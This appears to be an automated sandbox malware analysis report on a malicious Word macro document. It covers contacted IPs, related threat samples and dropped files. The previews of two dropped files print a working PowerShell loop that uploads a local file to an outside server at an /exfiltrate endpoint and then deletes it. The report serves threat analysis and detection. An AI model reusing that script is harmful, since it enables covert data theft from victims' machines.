https://go.micro	powershell.exe, 0000000F.00000002.2600077843.000000000590B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.157.68.73:11858/exfiltrate)3D6	powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.1335282288.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.157.68.73:11858	powershell.exe, 0000000F.00000002.2600077843.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005494000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:8000/download/ps1	vbaProject.bin	false	Avira URL Cloud: safe	unknown
http://18.157.68.73:11858/exfiltratel	powershell.exe, 0000000F.00000002.2598009249.0000000003180000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.1332259932.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005261000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.157.68.73:11858/exfiltrateK2b7	powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.157.68.73:11858/exfiltrate&	powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.157.68.73	unknown	United States		16509	AMAZON-02US	true
52.219.171.190	s3-r-w.eu-central-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632753
Start date and time:	2025-03-09 02:18:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mal_temp.dotm.doc
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@8/14@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 30 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 23.60.203.209, 52.109.68.129, 13.89.179.14, 23.50.131.132, 23.50.131.156, 52.109.32.46, 52.109.32.38, 52.109.32.39, 52.109.32.47, 52.123.129.14, 40.126.32.68, 52.149.20.212
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, c.pki.goog, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.net, nleditor.osi.office.net, prod-eu-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, config.officeapps.live.com, e16604.f
Execution Graph export aborted for target powershell.exe, PID 7420 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8160 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:19:30	API Interceptor	99x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
18.157.68.73	20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1	Get hash	malicious	XWorm	Browse
	mod.exe	Get hash	malicious	Njrat	Browse
	fBpY1pYq34.exe	Get hash	malicious	Njrat	Browse
	f3aef511705f37f9792c6032b936ca61.exe	Get hash	malicious	Njrat	Browse
	Ve0c8i5So2.exe	Get hash	malicious	Njrat	Browse
	b8UsrDOVGV.exe	Get hash	malicious	Njrat	Browse
	81Rz15POL6.exe	Get hash	malicious	Njrat	Browse
	649DB66A36E095B16832637A31D3CCC75040C5A6C23F6.exe	Get hash	malicious	Njrat	Browse
	RWqHoCWEPI.exe	Get hash	malicious	Njrat	Browse
	VBUXm77rfL.exe	Get hash	malicious	Njrat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.eu-central-1.amazonaws.com	https://eu1.hubs.ly/H0g2prd0	Get hash	malicious	Unknown	Browse	3.5.136.154
	https://mailtrack.io/l/f417f9a1ba0740bbe0f8b9fcdcdd50bf6dcca2af	Get hash	malicious	HTMLPhisher	Browse	52.219.47.104
	https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==	Get hash	malicious	BlackHacker JS Obfuscator, HTMLPhisher	Browse	3.5.138.248
	https://raidsonic-static-content.s3.eu-central-1.amazonaws.com/IcyBox/Files/Firmware_IB-DK4050-CPD.zip	Get hash	malicious	Unknown	Browse	3.5.134.98
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	3.5.135.206
	https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html	Get hash	malicious	ScreenConnect Tool	Browse	3.5.139.117
	https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html	Get hash	malicious	ScreenConnect Tool	Browse	3.5.137.142
	https://u47872954.ct.sendgrid.net/ls/click?upn=u001.fn1BsYIkFXRWxBLF12AvXhKUqktmOI7EPkchHYpa8lb2yJr9vm47Biq1iwhYH4x0W6E6_1tlZTUgFpToOJRvXeJjZ1lQQtiPaV281MW3UjMlmRxOXQrHf3E28Ct8cWw3pFJv8ww35QVlHVAsV9LrE8WJ-2FqWVvVFyUxLS7XbjE4ioBaNzI7Y9AQvglzmjEqljOvLuB-2FqyLAOnwfIZ8a2UOhb0kq4DsltFbCSVl8L5tTVcXPovhejZuw7J5gFYEuhvfLU6jp9IiI6bOp4vutoVple794Svog7VmNTHCQykEIajsBwvsIA9xBhrTaUhPe3riTZOj5RQVgP8LolzHF5ds6ImaI4Q1KNsmEF06CineSoPu7BKGd-2B4IINKzojAY3yUTkdWQLuCwDcmh7vK-2Fm4MQ0xAiPJ-2BNim16FZPVrX44e4DFM1rc1r1ZYN2APdeEIThalu0Ag-2BNzl5TCF9-2F-2B4cIgV-2B8ceF573hvcKOOmdD1jbxRbFryn-2FGT77SPyR6cNo7joqYajHU5-2F1gyPof24NnmOIwvhn7qKr0Ihz3SIWFLubPXV0GdcG6guT-2FBjwN6h83YPSF-2F5Pk0uzrf9DG4ZRnISsjJaazqmdBRAAsyoWwP5iXWDQEfiJXubX9fD-2BREtQifDIoI36c8qvCy5hrOP9aAfzd2djtg-2B8gR7MvgWYCa5sA7wAgdCKrrNRjX7eeAtG5StCtmRi-2BsSO4PCFgsA4QlR8AVRyhdPdKhSYzgA-2F1BCyYmRsFeWn4YzRn0mexGeZM3PwhHAdqlfom16LJGSiVeG98p5ZK5N-2BZQuMTlINorxwlmSmaGarY5x7TUyztB-2Bv8L8gRhXdcDKSzxiMknwYCjp3XaQdwr-2Fp8kePQSl33tJvX1ITAiP7FBhlwoPgNxbRoTwVzl0I2Q2bE71pQB2jeSQldBukVcgJT-2BrmpKQA1GW5-2B59frk-3D	Get hash	malicious	Unknown	Browse	52.219.169.110
	https://share.nuclino.com/p/Mlanie-BAUDRY-PARTAGER-UN-FICHIER-POUR-RVISION-4ogXl9spWg3RaCX5e3wD3b	Get hash	malicious	Unknown	Browse	3.5.139.156
	https://oakvillemdcsignin.softr.app/	Get hash	malicious	Unknown	Browse	52.219.169.178
s-0005.dual-s-msedge.net	Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg	Get hash	malicious	ScreenConnect Tool	Browse	52.123.129.14
	RFQ-JC25-#595837.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	52.123.128.14
	New Order.xls	Get hash	malicious	Unknown	Browse	52.123.129.14
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.129.14
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.129.14
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	52.123.128.14
	New Order.xls	Get hash	malicious	Unknown	Browse	52.123.128.14
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	aarch64.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	i686.elf	Get hash	malicious	Unknown	Browse	54.123.82.234
	i686.elf	Get hash	malicious	Unknown	Browse	13.33.175.237
	arm6.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	Sryxen-Built.exe	Get hash	malicious	Unknown	Browse	108.138.128.56
	SecuriteInfo.com.Variant.Fragtor.519143.11279.16206.exe	Get hash	malicious	Poverty Stealer	Browse	185.166.143.50
	SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe	Get hash	malicious	Poverty Stealer	Browse	185.166.143.48
	sh4.elf	Get hash	malicious	Mirai	Browse	18.180.172.177
	arm.elf	Get hash	malicious	Mirai	Browse	18.182.140.102
	m68k.elf	Get hash	malicious	Mirai	Browse	18.227.209.61
AMAZON-02US	aarch64.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	i686.elf	Get hash	malicious	Unknown	Browse	54.123.82.234
	i686.elf	Get hash	malicious	Unknown	Browse	13.33.175.237
	arm6.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	Sryxen-Built.exe	Get hash	malicious	Unknown	Browse	108.138.128.56
	SecuriteInfo.com.Variant.Fragtor.519143.11279.16206.exe	Get hash	malicious	Poverty Stealer	Browse	185.166.143.50
	SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe	Get hash	malicious	Poverty Stealer	Browse	185.166.143.48
	sh4.elf	Get hash	malicious	Mirai	Browse	18.180.172.177
	arm.elf	Get hash	malicious	Mirai	Browse	18.182.140.102
	m68k.elf	Get hash	malicious	Mirai	Browse	18.227.209.61

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	1.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	Dropper.exe	Get hash	malicious	AsyncRAT, Trap Stealer, XWorm	Browse	52.219.171.190
	setup.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	ggetokken.bat	Get hash	malicious	Unknown	Browse	52.219.171.190
	hGlhyegaG6.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	1.exe	Get hash	malicious	Unknown	Browse	52.219.171.190
	setup.msi	Get hash	malicious	Unknown	Browse	52.219.171.190
	5bf784.msi	Get hash	malicious	Unknown	Browse	52.219.171.190

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1424
Entropy (8bit):	5.440918739864665
Encrypted:	false
SSDEEP:	24:3SQWSKco4KmM6GjKMs4RP7mFoUebIl+mZ9tXt/NK3R88bJ0qHrk9J+zCW:iQWSU4Yc4RTmFoUeU+mZ9tlNWR83qH46
MD5:	65D418AC27134540C519BACB0116D39E
SHA1:	B6CC74D0E34FCE62E3CD693514E42F6039A8414F
SHA-256:	56240991F09D90CFBAF2635E43C88E55E8DA4C522B72C40E55D9DDBCA862FBBE
SHA-512:	24A8136BCC07D0E0348F986AB77CC34A48E6EC1C23761421249EA7194E69ACAEFA59AC6ED494C492E9EB45E0773EEA32C9D95F43CB00D78B899771EAA502D1C4
Malicious:	false
Reputation:	low
Preview:	@...e...........#....................................@..........P................1]...E.....#.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.ConfigurationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20idcw3m.ibq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkawnr1s.2mu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1t2yshk.nal.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnpfzwmj.lnk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\downloaded_script.ps1

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1728
Entropy (8bit):	5.018394199770559
Encrypted:	false
SSDEEP:	24:w87X708icViusbvwoe/A4EhjSwWpj9Ybe0/9hIyzTbq0aeEpw0SRaBVF:waXpTo0A7hL/VVmAbmeEa0SRIF
MD5:	80AFB207FBD093A17256554F036D4CB3
SHA1:	B635E41502EB23BDFDD40586177CAAFBF467B317
SHA-256:	043E5978F1C1BB2A465537C092890D6AED187C855DD9B1CE92B58006584C0D58
SHA-512:	454B92B0F1D177863A2F2DDEBFF0B303E61D66B44D8109F6C24D1F8829772017D5999A8CA627612DDEB436E15EFBCEF52DF9EA7E6E7F15C418E9810AD88B83EC
Malicious:	true
Preview:	..$filePath = "$env:TEMP\flag.txt"..$serverUrl = "http://18.157.68.73:11858/exfiltrate"....# Define the script logic as a string..$scriptContent = @'..param($filePath, $serverUrl)....function UploadFile {.. param($path, $url).. try {.. $webClient = New-Object System.Net.WebClient.. $webClient.Headers.Add("User-Agent", "Mozilla/5.0").. $webClient.Headers.Add("Content-Type", "text/plain").... if (Test-Path $path) {.. #Write-Host "[*] Uploading file: $path".. $webClient.UploadFile($url, "POST", $path).. #Write-Host "[+] File uploaded successfully!".. Remove-Item -Path $path -Force.. } else {.. #Write-Host "[!] No flag file found. Sending empty notification.".. $webClient.UploadString($url, "POST", "No Flag file").. }.. } catch {.. #Write-Host "[!] Error: $($_.Exception.Message)".. } finally {.. $webClient.Dispose().. }..}....while ($true) {.. UploadFi

C:\Users\user\AppData\Local\Temp\upload_script.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	917
Entropy (8bit):	4.79650594634178
Encrypted:	false
SSDEEP:	12:I8icViuaNbgQNwoe/w664SN/RaujOXwWl5pZ0tYFNyEYv:I8icViusbvwoe/A4EhjSwWpj9Yv
MD5:	2B8A7215052D4DC2CB4260D6D9304BCE
SHA1:	791B8B66237391B7CE84B16A0EB732C1BDBB4BB9
SHA-256:	A45A9E35349F96EB3C05A6D8F651DB9435335B09B0AED6F91815FA847B57C591
SHA-512:	336D40F754D00B82390875A73EDFE64D5A112EC9FDCDC7DABDFD6A70CED3E568AD589AE431CFEB487FE8FB598DB23864EA5CF07CD20B9C55527020A1CFD4A100
Malicious:	true
Preview:	param($filePath, $serverUrl)....function UploadFile {.. param($path, $url).. try {.. $webClient = New-Object System.Net.WebClient.. $webClient.Headers.Add("User-Agent", "Mozilla/5.0").. $webClient.Headers.Add("Content-Type", "text/plain").... if (Test-Path $path) {.. #Write-Host "[*] Uploading file: $path".. $webClient.UploadFile($url, "POST", $path).. #Write-Host "[+] File uploaded successfully!".. Remove-Item -Path $path -Force.. } else {.. #Write-Host "[!] No flag file found. Sending empty notification.".. $webClient.UploadString($url, "POST", "No Flag file").. }.. } catch {.. #Write-Host "[!] Error: $($_.Exception.Message)".. } finally {.. $webClient.Dispose().. }..}....while ($true) {.. UploadFile -path $filePath -url $serverUrl.. Start-Sleep -Seconds 60..}..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HUP3T8IDFRWN6X9UZSKF.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7194774870443275
Encrypted:	false
SSDEEP:	96:VpLZUz3Cl+52kvhkvCCtuCBLQHRCBLQH5:VPU+2iuCBLiCBLE
MD5:	B3888EC281E0F3F34F69D6EF1DFB58D0
SHA1:	4CC7BD409D720EB4B28645CDC509A1EE9BC1C35D
SHA-256:	8F79BC7C1B44E621F29B2BBFDFE5FBFEB2F52CAC785359850E35D4FBBCBEC6BC
SHA-512:	EA64058768337F0A90841F3B983DEA2B9AD19989B1A796C88DA3BA66D465BD5478E12E1BF3D82F70BFC916E2BD6D97DBE9979406BE30977C361CC1EE5300AF44
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......C....Q&.O........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^iZb............................%..A.p.p.D.a.t.a...B.V.1.....iZf...Roaming.@......CW.^iZf...........................lh..R.o.a.m.i.n.g.....\.1.....iZk...MICROS~1..D......CW.^iZk...........................:a..M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T............................Y.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7194774870443275
Encrypted:	false
SSDEEP:	96:VpLZUz3Cl+52kvhkvCCtuCBLQHRCBLQH5:VPU+2iuCBLiCBLE
MD5:	B3888EC281E0F3F34F69D6EF1DFB58D0
SHA1:	4CC7BD409D720EB4B28645CDC509A1EE9BC1C35D
SHA-256:	8F79BC7C1B44E621F29B2BBFDFE5FBFEB2F52CAC785359850E35D4FBBCBEC6BC
SHA-512:	EA64058768337F0A90841F3B983DEA2B9AD19989B1A796C88DA3BA66D465BD5478E12E1BF3D82F70BFC916E2BD6D97DBE9979406BE30977C361CC1EE5300AF44
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......C....Q&.O........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^iZb............................%..A.p.p.D.a.t.a...B.V.1.....iZf...Roaming.@......CW.^iZf...........................lh..R.o.a.m.i.n.g.....\.1.....iZk...MICROS~1..D......CW.^iZk...........................:a..M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T............................Y.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Users\user\Desktop\mal_temp.dotm.doc (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	29788
Entropy (8bit):	7.7268729392842435
Encrypted:	false
SSDEEP:	768:yZX/CWwQ17q5Bvn15V33Fau4i7I91FRct5r:yxZ17qLjV33AugBaLr
MD5:	D5CB326E50C2AFE07CBCFC0ED4108B13
SHA1:	CB508BF58CCFD613CE80A3691DC3AD5F0D07CBF5
SHA-256:	4A9FD98FA9A701C6B9A64BE9D8DBC6ACE8DBB910E91799C78EA1258C251F1929
SHA-512:	A848672603C5D749071488F6E62D46639B44B50E041219A55AE071DD3FDD24112043486498C067076C4143E45110BBA71AB62C1D8A29A527D67F08849DB4B984
Malicious:	true
Preview:	PK..........!.\|..\|............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-.]X ......J..p.Ik......=.&-...(.D.=..;.3.....9.d.+.).....i.......J.e...l..].....e.........I....}.G;..V"...R=.)..^.\(....X3.?.R.T..,h.I21.e.M]mU0.Be.D..s..M./K...'r...(d.[X.u.>G......43!.P...zg.A...s.FC6........KJ...v]K8......*..''.....q.[]..../L[E'9....So...4jV.^AJt.m..n.= ....Zrg.W.<.,..xg..\|.......tg......t..+..K..q........~.......[.q$...A=U4.o..j..........PK..........!.........N......._rels

C:\Users\user\Desktop\~$l_temp.dotm.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.9929193025094367
Encrypted:	false
SSDEEP:	3:KVGl/lilKlRAGl3taPj1VWhklt2/mkblhD3e0HqsJE2s:KVy/4KDJaj18yltBuu0fe2s
MD5:	3FD710850A321742DE3F53B832D9CB6D
SHA1:	F239647DB955C6D3A2BEF591806D6D6AC2315A8B
